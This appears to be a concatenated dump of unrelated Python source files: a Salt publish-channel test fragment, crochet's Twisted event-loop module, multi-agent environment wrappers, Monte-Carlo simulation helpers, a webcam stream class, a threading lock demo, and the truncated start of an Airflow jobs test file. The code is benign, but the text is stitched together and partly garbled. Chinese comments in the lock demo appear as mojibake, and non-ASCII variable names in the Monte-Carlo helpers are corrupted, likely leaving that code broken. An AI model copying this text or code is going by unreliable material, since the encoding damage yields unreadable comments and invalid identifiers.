channel.publish({"test": "value", "tgt_type": "glob", "tgt": "*"})
payload = wrap.send.call_args[0][0]
# verify we send it without any specific topic
assert "topic_lst" not in payload
# try simple publish with list tgt_type
channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
payload = wrap.send.call_args[0][0]
# verify we send it with correct topic
assert "topic_lst" in payload
self.assertEqual(payload["topic_lst"], ["minion01"])
# try with syndic settings
opts["order_masters"] = True
channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
payload = wrap.send.call_args[0][0]
# verify we send it without topic for syndics
assert "topic_lst" not in payload
@patch("salt.utils.minions.CkMinions.check_minions")
@patch("salt.master.SMaster.secrets")
@patch("salt.crypt.Crypticle")
@patch("salt.utils.asynchronous.SyncWrapper")
def test_publish_filtering_str_list(
self, sync_wrapper, crypticle, secrets, check_minions
):
opts = self.get_temp_config("master")
opts["sign_pub_messages"] = False
channel = TCPPubServerChannel(opts)
wrap = MagicMock()
crypt = MagicMock()
crypt.dumps.return_value = {"test": "value"}
secrets.return_value = {"aes": {"secret": None}}
crypticle.return_value = crypt
sync_wrapper.return_value = wrap
check_minions.return_value = {"minions": ["minion02"]}
# try simple publish with list tgt_type
channel.publish({"test": "value", "tgt_type": "list", "tgt": "minion02"})
payload = wrap.send.call_args[0][0]
# verify we send it with correct topic
assert "topic_lst" in payload
self.assertEqual(payload["topic_lst"], ["minion02"])
# verify it was correctly calling check_minions
check_minions.assert_called_with("minion02", tgt_type="list")
|
_eventloop.py | """
Expose Twisted's event loop to threaded programs.
"""
from __future__ import absolute_import
import select
import threading
import weakref
import warnings
from functools import wraps
import imp
from twisted.python import threadable
from twisted.python.runtime import platform
from twisted.python.failure import Failure
from twisted.python.log import PythonLoggingObserver, err
from twisted.internet.defer import maybeDeferred
from twisted.internet.task import LoopingCall
import wrapt
from ._util import synchronized
from ._resultstore import ResultStore
_store = ResultStore()
if hasattr(weakref, "WeakSet"):
WeakSet = weakref.WeakSet
else:
class WeakSet(object):
"""
Minimal WeakSet emulation.
"""
def __init__(self):
self._items = weakref.WeakKeyDictionary()
def add(self, value):
self._items[value] = True
def __iter__(self):
return iter(self._items)
class TimeoutError(Exception): # pylint: disable=redefined-builtin
"""
A timeout has been hit.
"""
class ReactorStopped(Exception):
"""
The reactor has stopped, and therefore no result will ever become
available from this EventualResult.
"""
class ResultRegistry(object):
"""
Keep track of EventualResults.
Once the reactor has shutdown:
1. Registering new EventualResult instances is an error, since no results
will ever become available.
2. Already registered EventualResult instances are "fired" with a
ReactorStopped exception to unblock any remaining EventualResult.wait()
calls.
"""
def __init__(self):
self._results = WeakSet()
self._stopped = False
self._lock = threading.Lock()
@synchronized
def register(self, result):
"""
Register an EventualResult.
May be called in any thread.
"""
if self._stopped:
raise ReactorStopped()
self._results.add(result)
@synchronized
def stop(self):
"""
Indicate no more results will get pushed into EventualResults, since
the reactor has stopped.
This should be called in the reactor thread.
"""
self._stopped = True
for result in self._results:
result._set_result(Failure(ReactorStopped()))
class EventualResult(object):
"""
A blocking interface to Deferred results.
This allows you to access results from Twisted operations that may not be
available immediately, using the wait() method.
In general you should not create these directly; instead use functions
decorated with @run_in_reactor.
"""
def __init__(self, deferred, _reactor):
"""
The deferred parameter should be a Deferred or None indicating
_connect_deferred will be called separately later.
"""
self._deferred = deferred
self._reactor = _reactor
self._value = None
self._result_retrieved = False
self._result_set = threading.Event()
if deferred is not None:
self._connect_deferred(deferred)
def _connect_deferred(self, deferred):
"""
Hook up the Deferred that that this will be the result of.
Should only be run in Twisted thread, and only called once.
"""
self._deferred = deferred
# Because we use __del__, we need to make sure there are no cycles
# involving this object, which is why we use a weakref:
def put(result, eventual=weakref.ref(self)):
eventual = eventual()
if eventual:
eventual._set_result(result)
else:
err(result, "Unhandled error in EventualResult")
deferred.addBoth(put)
def _set_result(self, result):
"""
Set the result of the EventualResult, if not already set.
This can only happen in the reactor thread, either as a result of
Deferred firing, or as a result of ResultRegistry.stop(). So, no need
for thread-safety.
"""
if self._result_set.isSet():
return
self._value = result
self._result_set.set()
def __del__(self):
if self._result_retrieved or not self._result_set.isSet():
return
if isinstance(self._value, Failure):
err(self._value, "Unhandled error in EventualResult")
def cancel(self):
"""
Try to cancel the operation by cancelling the underlying Deferred.
Cancellation of the operation may or may not happen depending on
underlying cancellation support and whether the operation has already
finished. In any case, however, the underlying Deferred will be fired.
Multiple calls will have no additional effect.
"""
self._reactor.callFromThread(lambda: self._deferred.cancel())
def _result(self, timeout=None):
"""
Return the result, if available.
It may take an unknown amount of time to return the result, so a
timeout option is provided. If the given number of seconds pass with
no result, a TimeoutError will be thrown.
If a previous call timed out, additional calls to this function will
still wait for a result and return it if available. If a result was
returned on one call, additional calls will return/raise the same
result.
"""
if timeout is None:
warnings.warn(
"Unlimited timeouts are deprecated.",
DeprecationWarning,
stacklevel=3)
# Queue.get(None) won't get interrupted by Ctrl-C...
timeout = 2 ** 28
self._result_set.wait(timeout)
# In Python 2.6 we can't rely on the return result of wait(), so we
# have to check manually:
if not self._result_set.is_set():
raise TimeoutError()
self._result_retrieved = True
return self._value
def wait(self, timeout=None):
"""
Return the result, or throw the exception if result is a failure.
It may take an unknown amount of time to return the result, so a
timeout option is provided. If the given number of seconds pass with
no result, a TimeoutError will be thrown.
If a previous call timed out, additional calls to this function will
still wait for a result and return it if available. If a result was
returned or raised on one call, additional calls will return/raise the
same result.
"""
if threadable.isInIOThread():
raise RuntimeError(
"EventualResult.wait() must not be run in the reactor thread.")
if imp.lock_held():
try:
imp.release_lock()
except RuntimeError:
# The lock is held by some other thread. We should be safe
# to continue.
pass
else:
# If EventualResult.wait() is run during module import, if the
# Twisted code that is being run also imports something the
# result will be a deadlock. Even if that is not an issue it
# would prevent importing in other threads until the call
# returns.
raise RuntimeError(
"EventualResult.wait() must not be run at module "
"import time.")
result = self._result(timeout)
if isinstance(result, Failure):
result.raiseException()
return result
def stash(self):
"""
Store the EventualResult in memory for later retrieval.
Returns a integer uid which can be passed to crochet.retrieve_result()
to retrieve the instance later on.
"""
return _store.store(self)
def original_failure(self):
"""
Return the underlying Failure object, if the result is an error.
If no result is yet available, or the result was not an error, None is
returned.
This method is useful if you want to get the original traceback for an
error result.
"""
try:
result = self._result(0.0)
except TimeoutError:
return None
if isinstance(result, Failure):
return result
else:
return None
class ThreadLogObserver(object):
"""
A log observer that wraps another observer, and calls it in a thread.
In particular, used to wrap PythonLoggingObserver, so that blocking
logging.py Handlers don't block the event loop.
"""
def __init__(self, observer):
self._observer = observer
if getattr(select, "epoll", None):
from twisted.internet.epollreactor import EPollReactor
reactorFactory = EPollReactor
elif getattr(select, "poll", None):
from twisted.internet.pollreactor import PollReactor
reactorFactory = PollReactor
else:
from twisted.internet.selectreactor import SelectReactor
reactorFactory = SelectReactor
self._logWritingReactor = reactorFactory()
self._logWritingReactor._registerAsIOThread = False
self._thread = threading.Thread(
target=self._reader, name="CrochetLogWriter")
self._thread.start()
def _reader(self):
"""
Runs in a thread, reads messages from a queue and writes them to
the wrapped observer.
"""
self._logWritingReactor.run(installSignalHandlers=False)
def stop(self):
"""
Stop the thread.
"""
self._logWritingReactor.callFromThread(self._logWritingReactor.stop)
def __call__(self, msg):
"""
A log observer that writes to a queue.
"""
def log():
try:
self._observer(msg)
except Exception:
# Lower-level logging system blew up, nothing we can do, so
# just drop on the floor.
pass
self._logWritingReactor.callFromThread(log)
class EventLoop(object):
"""
Initialization infrastructure for running a reactor in a thread.
"""
def __init__(
self,
reactorFactory,
atexit_register,
startLoggingWithObserver=None,
watchdog_thread=None,
reapAllProcesses=None
):
"""
reactorFactory: Zero-argument callable that returns a reactor.
atexit_register: atexit.register, or look-alike.
startLoggingWithObserver: Either None, or
twisted.python.log.startLoggingWithObserver or lookalike.
watchdog_thread: crochet._shutdown.Watchdog instance, or None.
reapAllProcesses: twisted.internet.process.reapAllProcesses or
lookalike.
"""
self._reactorFactory = reactorFactory
self._atexit_register = atexit_register
self._startLoggingWithObserver = startLoggingWithObserver
self._started = False
self._lock = threading.Lock()
self._watchdog_thread = watchdog_thread
self._reapAllProcesses = reapAllProcesses
def _startReapingProcesses(self):
"""
Start a LoopingCall that calls reapAllProcesses.
"""
lc = LoopingCall(self._reapAllProcesses)
lc.clock = self._reactor
lc.start(0.1, False)
def _common_setup(self):
"""
The minimal amount of setup done by both setup() and no_setup().
"""
self._started = True
self._reactor = self._reactorFactory()
self._registry = ResultRegistry()
# We want to unblock EventualResult regardless of how the reactor is
# run, so we always register this:
self._reactor.addSystemEventTrigger(
"before", "shutdown", self._registry.stop)
@synchronized
def setup(self):
"""
Initialize the crochet library.
This starts the reactor in a thread, and connect's Twisted's logs to
Python's standard library logging module.
This must be called at least once before the library can be used, and
can be called multiple times.
"""
if self._started:
return
self._common_setup()
if platform.type == "posix":
self._reactor.callFromThread(self._startReapingProcesses)
if self._startLoggingWithObserver:
observer = ThreadLogObserver(PythonLoggingObserver().emit)
def start():
# Twisted is going to override warnings.showwarning; let's
# make sure that has no effect:
from twisted.python import log
original = log.showwarning
log.showwarning = warnings.showwarning
self._startLoggingWithObserver(observer, False)
log.showwarning = original
self._reactor.callFromThread(start)
# We only want to stop the logging thread once the reactor has
# shut down:
self._reactor.addSystemEventTrigger(
"after", "shutdown", observer.stop)
t = threading.Thread(
target=lambda: self._reactor.run(installSignalHandlers=False),
name="CrochetReactor")
t.start()
self._atexit_register(self._reactor.callFromThread, self._reactor.stop)
self._atexit_register(_store.log_errors)
if self._watchdog_thread is not None:
self._watchdog_thread.start()
@synchronized
def no_setup(self):
"""
Initialize the crochet library with no side effects.
No reactor will be started, logging is uneffected, etc.. Future calls
to setup() will have no effect. This is useful for applications that
intend to run Twisted's reactor themselves, and so do not want
libraries using crochet to attempt to start it on their own.
If no_setup() is called after setup(), a RuntimeError is raised.
"""
if self._started:
raise RuntimeError(
"no_setup() is intended to be called once, by a"
" Twisted application, before any libraries "
"using crochet are imported and call setup().")
self._common_setup()
@wrapt.decorator
def _run_in_reactor(self, function, _, args, kwargs):
"""
Implementation: A decorator that ensures the wrapped function runs in
the reactor thread.
When the wrapped function is called, an EventualResult is returned.
"""
def runs_in_reactor(result, args, kwargs):
d = maybeDeferred(function, *args, **kwargs)
result._connect_deferred(d)
result = EventualResult(None, self._reactor)
self._registry.register(result)
self._reactor.callFromThread(runs_in_reactor, result, args, kwargs)
return result
def run_in_reactor(self, function):
"""
A decorator that ensures the wrapped function runs in the
reactor thread.
When the wrapped function is called, an EventualResult is returned.
"""
result = self._run_in_reactor(function)
# Backwards compatibility; use __wrapped__ instead.
try:
result.wrapped_function = function
except AttributeError:
pass
return result
def wait_for_reactor(self, function):
"""
DEPRECATED, use wait_for(timeout) instead.
A decorator that ensures the wrapped function runs in the reactor
thread.
When the wrapped function is called, its result is returned or its
exception raised. Deferreds are handled transparently.
"""
warnings.warn(
"@wait_for_reactor is deprecated, use @wait_for instead",
DeprecationWarning,
stacklevel=2)
# This will timeout, in theory. In practice the process will be dead
# long before that.
return self.wait_for(2**31)(function)
def wait_for(self, timeout):
"""
A decorator factory that ensures the wrapped function runs in the
reactor thread.
When the wrapped function is called, its result is returned or its
exception raised. Deferreds are handled transparently. Calls will
timeout after the given number of seconds (a float), raising a
crochet.TimeoutError, and cancelling the Deferred being waited on.
"""
def decorator(function):
@wrapt.decorator
def wrapper(function, _, args, kwargs):
@self.run_in_reactor
def run():
return function(*args, **kwargs)
eventual_result = run()
try:
return eventual_result.wait(timeout)
except TimeoutError:
eventual_result.cancel()
raise
result = wrapper(function)
# Expose underling function for testing purposes; this attribute is
# deprecated, use __wrapped__ instead:
try:
result.wrapped_function = function
except AttributeError:
pass
return result
return decorator
def in_reactor(self, function):
"""
DEPRECATED, use run_in_reactor.
A decorator that ensures the wrapped function runs in the reactor
thread.
The wrapped function will get the reactor passed in as a first
argument, in addition to any arguments it is called with.
When the wrapped function is called, an EventualResult is returned.
"""
warnings.warn(
"@in_reactor is deprecated, use @run_in_reactor",
DeprecationWarning,
stacklevel=2)
@self.run_in_reactor
@wraps(function)
def add_reactor(*args, **kwargs):
return function(self._reactor, *args, **kwargs)
return add_reactor
|
env_wrappers_poet_sp.py | """
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
# import time; start = time.time()
ob, reward, done, info = env.step(data)
# end = time.time()
# if end-start > 0.7:
# print('********')
# print('one_step: ',end-start)
if all(done):
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd[0] == 'new_starts_obs':
now_agent_num = cmd[1]
starts = cmd[2]
index_index = cmd[3]
ob = env.new_starts_obs(starts,now_agent_num,index_index)
remote.send(ob)
elif cmd[0:5] == 'reset':
now_agent_num = int(cmd[5:])
ob = env.reset(now_agent_num)
remote.send(ob)
elif cmd[0:8] == "init_set":
now_agent_num = int(cmd[8:])
ob = env.init_set(now_agent_num)
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'get_agent_types':
if all([hasattr(a, 'adversary') for a in env.agents]):
remote.send(['adversary' if a.adversary else 'agent' for a in env.agents])
else:
remote.send(['agent' for _ in env.agents])
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(('get_agent_types', None))
self.agent_types = self.remotes[0].recv()
self.length = len(env_fns)
VecEnv.__init__(self, self.length, observation_space, action_space)
def step_async(self, actions, now_num_processes):
# import time;
# start = time.time()
i = 0
for remote, action in zip(self.remotes, actions):
# import pdb; pdb.set_trace()
if i < now_num_processes:
remote.send(('step', action))
i += 1
# end = time.time()
# print('time_send: ',end-start)
self.waiting = True
def step_wait(self, now_num_processes):
# import time; start = time.time()
results = []
i = 0
for remote in self.remotes:
if i < now_num_processes:
results.append(remote.recv())
i += 1
# results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
# end = time.time()
# print('time_get: ',end-start)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
# def reset(self):
# for remote in self.remotes:
# remote.send(('reset', None))
# return np.stack([remote.recv() for remote in self.remotes])
def new_starts_obs(self, starts, now_agent_num, now_num_processes):
tmp_list = ['new_starts_obs', now_agent_num, starts]
i = 0
results = []
for remote in self.remotes:
if i < now_num_processes:
index_index = [i]
remote.send((tmp_list + index_index, None))
i += 1
i = 0
for remote in self.remotes:
if i < now_num_processes:
results.append(remote.recv())
i += 1
return np.stack(results)
# using by main_reverse
# def new_starts_obs(self, starts, now_agent_num):
# self.new_starts_obs_async(starts, sample_index, now_agent_num)
# return self.new_starts_obs_wait()
# def new_starts_obs_async(self, starts, sample_index, now_agent_num):
# tmp_list = ['new_starts_obs', now_agent_num, starts, sample_index]
# i = 0
# for remote in self.remotes:
# index_index = [i] # sample_index็index
# remote.send((tmp_list + index_index, None))
# i += 1
# self.waiting = True
# def new_starts_obs_wait(self):
# results = [remote.recv() for remote in self.remotes]
# self.waiting = False
# obs, rou_index = zip(*results)
# return np.stack(obs), np.stack(rou_index)
def init_set(self, now_agent_num, ratio):
hard_num = int(self.length * ratio)
count = 0
for remote in self.remotes:
if count <= hard_num:
remote.send(('init_set' + str(now_agent_num), None))
else:
remote.send(('reset' + str(now_agent_num), None))
count = count + 1
return np.stack([remote.recv() for remote in self.remotes])
def reset(self, now_agent_num):
for remote in self.remotes:
remote.send(('reset' + str(now_agent_num), None))
tmp = np.stack([remote.recv() for remote in self.remotes])
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, self.length, observation_space, action_space)
return tmp
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
self.length = len(env_fns)
#import pdb; pdb.set_trace()
VecEnv.__init__(self, self.length, env.observation_space, env.action_space)
if all([hasattr(a, 'adversary') for a in env.agents]):
self.agent_types = ['adversary' if a.adversary else 'agent' for a in
env.agents]
else:
self.agent_types = ['agent' for _ in env.agents]
self.ts = np.zeros(len(self.envs), dtype='int')
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
self.ts += 1
for (i, done) in enumerate(dones):
if all(done):
obs[i] = self.envs[i].reset()
self.ts[i] = 0
self.actions = None
return np.array(obs), np.array(rews), np.array(dones), infos
# def new_starts_obs(self, starts, now_agent_num):
# seed = 1
# obs,rou_index = env.new_starts_obs(starts,now_agent_num,seed)
# return np.array(obs)
def init_set(self, now_agent_num):
results = [env.init_set(now_agent_num) for env in self.envs]
return np.array(results)
# def reset(self):
# results = [env.reset() for env in self.envs]
# return np.array(results)
def reset(self, now_agent_num):
results = [env.reset(now_agent_num) for env in self.envs]
env = self.envs[0]
VecEnv.__init__(self, self.length, env.observation_space, env.action_space)
# import pdb; pdb.set_trace()
return np.array(results)
def close(self):
return |
monte_carlo_tools.py | ##############################################################################
# Some functions to make Monte-Carlo simulations smoother
# Authored by Ammar Mian, 29/10/2018
# e-mail: ammar.mian@centralesupelec.fr
##############################################################################
# Copyright 2018 @CentraleSupelec
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from multiprocessing import Process, Queue
import numpy as np
from LRST.generic_functions import *
import time
from tqdm import tqdm
def wrapper_multivariate_complex_normal_samples(data_args):
""" A wrapper for the Gaussian data generation function multivariate_complex_normal_samples
in order to have a generic form for Monte-Carlo function """
mean, covariance, N, pseudo_covariance = data_args
return multivariate_complex_normal_samples(mean, covariance, N, pseudo_covariance)
def wrapper_multivariate_complex_t_samples(data_args):
""" A wrapper for the t distribution data generation function multivariate_complex_t_samples
in order to have a generic form for Monte-Carlo function """
mean, covariance, N, df, pseudo_covariance = data_args
return multivariate_complex_t_samples(mean, covariance, N, df, pseudo_covariance)
def wrapper_multivariate_complex_K_samples(data_args):
""" A wrapper for the K distribution data generation function wrapper_multivariate_complex_K_samples
in order to have a generic form for Monte-Carlo function """
mean, covariance, N, mu, b, pseudo_covariance = data_args
return multivariate_complex_K_samples(mean, covariance, N, mu, b, pseudo_covariance)
def wrapper_multivariate_complex_Cauchy_samples(data_args):
""" A wrapper for the Cauchy distribution data generation function multivariate_complex_Cauchy_samples
in order to have a generic form for Monte-Carlo function """
mean, covariance, N, mu, b, pseudo_covariance = data_args
return multivariate_complex_Cauchy_samples(mean, covariance, N, mu, b, pseudo_covariance)
def wrapper_multivariate_complex_Laplace_samples(data_args):
""" A wrapper for the Laplace distribution data generation function multivariate_complex_Laplace_samples
in order to have a generic form for Monte-Carlo function """
mean, covariance, N, beta, pseudo_covariance = data_args
return multivariate_complex_Laplace_samples(mean, covariance, N, beta, pseudo_covariance)
def generate_time_series_multivariate_vector(Args):
""" A function to generate a time series of random samples of dimension p, where at each date
there is N independent observations having the same set of parameters. The length of the series is T.
Inputs:
* Args compromising:
* p = dimension of samples
* N = number of samples at each date sharing the same distribution parameters
* T = length of time series
* data_generation_function = a function to generate random samples for each date:
must generate an array of shape (p, N)
* data_args = list of arguments corresponding to the values of the parameters of
the random distribution at each date
Outputs:
* an array of shape (p, N, T) corresponding to the time series"""
p, N, T, generation_function, data_args_list = Args
X = np.zeros((p, N, T)).astype(complex)
for t in range(0, T):
X[:, :, t] = generation_function(data_args_list[t])
return X
def compute_several_statistics(X, Args):
""" A function to compute and stack the results of several statistics on data X.
Inputs:
* X = the data
* Args = list constitued of statistics_list and statistics_args
Outputs:
* a list correspond to the value of each statistic on the data X. """
statistics_list, statistics_args = Args
ฮป = []
for i_statistic, statistic in enumerate(statistics_list):
ฮป.append(statistic(X, statistics_args[i_statistic]))
return ฮป
def compute_monte_carlo(data_generation_function, data_generation_args, function_to_compute,
function_args, number_of_trials, multi=False, queue=0, jobno=0):
""" A function that allowing to compute Monte-Carlo trials by generating random data and computing some
function of these observations
Inputs:
* data_generation_function = a function to generate the random data
* data_generation_args = arguments to pass to data_generation_function
* function_to_compute = a function to compute the desired quantity
* function_args = arguments to pass to function_to_compute
* number_of_trials = number of Monte-Carlo trials to run
* multi=False, queue=0, jobno=0 -> serves to parallelize
Outputs:
* a list containing the results at each trial """
# To have a different seed for each job
if multi:
np.random.seed(int(time.time())+jobno)
# Results container
results = []
for trial in tqdm(np.arange(0, number_of_trials)):
# Generate data
๐ = data_generation_function(data_generation_args)
# Compute the function of the observations
result_at_this_trial = function_to_compute(๐, function_args)
results.append(result_at_this_trial)
if multi:
queue.put(results)
else:
return results
def compute_monte_carlo_parallel(data_generation_function, data_generation_args, function_to_compute,
function_args, number_of_trials, multi=False, number_of_threads=4):
""" A function that is a prallelisation of compute_monte_carlo
Inputs:
* data_generation_function = a function to generate the random data
* data_generation_args = arguments to pass to data_generation_function
* function_to_compute = a function to compute the desired quantity
* function_args = arguments to pass to function_to_compute
* number_of_trials = number of Monte-Carlo trials to run
(multiple of number_of_threads please
or make sure that number_of_trials/number_of_threads is an
integer at least)
* multi = True if parallel computing, False if not
* number_of_threads = number of thread to use (number of cores of the machine in general)
Outputs:
* a list containing the results at each trial """
if multi:
results = [] # Results container
queues = [Queue() for i in range(number_of_threads)] # Serves to obtain result for each thread
args = [(data_generation_function, data_generation_args, function_to_compute,
function_args, int(number_of_trials/number_of_threads),
True, queues[i], i) for i in range(number_of_threads)]
jobs = [Process(target=compute_monte_carlo, args=a) for a in args]
# Starting parallel computation
for j in jobs: j.start()
# Obtaining result for each thread
for q in queues: results = results + q.get()
# Waiting for each thread to terminate
for j in jobs: j.join()
else:
results = compute_monte_carlo(data_generation_function, data_generation_args,
function_to_compute, function_args, number_of_trials, multi=False)
return results
|
webcamvideostream.py | # import the necessary packages
from threading import Thread
import cv2
class WebcamVideoStream:
def __init__(self, src=0, name="WebcamVideoStream"):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def release(self):
# stop recording and release all resources
self.stop()
self.stream.release()
def __del__(self):
# release the stream when it goes out of scope
self.release()
|
threading_lock.py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author: bigfoolliu
"""
ๅค็บฟ็จ้ไฟก
ไฝฟๆต่ฏ็ฑปๅๅ็จ้
"""
import threading
from threading import Thread
# ๅๅปบ้
lock = threading.Lock()
l = []
def no_lock_append_task(i):
"""ๆชไฝฟ็จ้็ๆ
ๅตไธๅๅ
จๅฑๅ้ๅ่กจlไธญๆทปๅ ๅ
็ด """
global l
l.append(i)
print("no lock l:", l)
def lock_append_task(i):
"""
ไฝฟ็จ้็ๆ
ๅตไธๅๅ
จๅฑๅ้ๅ่กจlไธญๆทปๅ ๅ
็ด
"""
global l
lock.acquire(blocking=True, timeout=2) # ่ทๅ้
l.append(i)
print("lock l:", l)
lock.release() # ้ๆพ้
def lock_demo(use_lock=False):
"""
ๆฏๅฆไฝฟ็จ้็็คบไพ
"""
if not use_lock:
for i in range(10):
t = Thread(target=no_lock_append_task, args=[i,])
t.start()
else:
for i in range(10):
t = Thread(target=lock_append_task, args=[i, ])
t.start()
def main():
# lock_demo(use_lock=True)
lock_demo()
if __name__ == '__main__':
main()
|
test_jobs.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEquals(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
